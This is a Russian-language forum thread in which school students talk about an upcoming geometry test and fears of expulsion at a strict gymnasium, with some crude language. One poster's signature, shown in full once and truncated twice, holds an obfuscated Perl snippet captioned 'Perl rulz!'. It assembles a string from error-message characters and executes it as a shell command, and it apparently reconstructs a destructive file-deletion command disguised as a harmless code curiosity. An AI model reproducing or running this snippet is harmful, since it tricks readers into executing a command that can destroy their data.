да.через неделю зачет по геометрии а я весь год пропинадлал ничего не писала всё по учебнику придется(( в девятом халява была тройки всем натягивали,а сейчас наоборот у них цель как можно больше человек выпереть. меня то не выгоднят,учусь я неплохо,а вот многих правда жалко. _________________ Freedom's just another word for nothin' left to lose.
вы же в одном классе? в 11? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Sandra
надежды не хватит,надо ботать,вот если бы ьты счас сели и начала ботать к экзаменам,то шанс МОЖЕТ БЫТЬ и появился бы,но ты хрен че делать будешь.ладно,что я те втирать это буду по сотому разу. _________________ Freedom's just another word for nothin' left to lose.
выпирать вас не надо НИКОМУ, поверьте, даже учителям, им это лишний гемор, намного больший чем протащить вас в сл. класс _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
у нас непросто школа ,а физмат гимназия,поэтому тут никто не тянет,а наоборот заваливают _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
ну тогда ебанитесь, сколько раз вас будут оставлять на сторой год?
да бред это все _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
не оставляют на второй год в 10 классе,просто дают справку _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
да ладно....если что всегда можно перейти в другую школу...до конца года...остался правда месяц только _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
Я незнаю...мне ща в гимназии тоже мозги ебут ,и под последнего героя косят. Пока держусь а вот как дальше будет...... _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!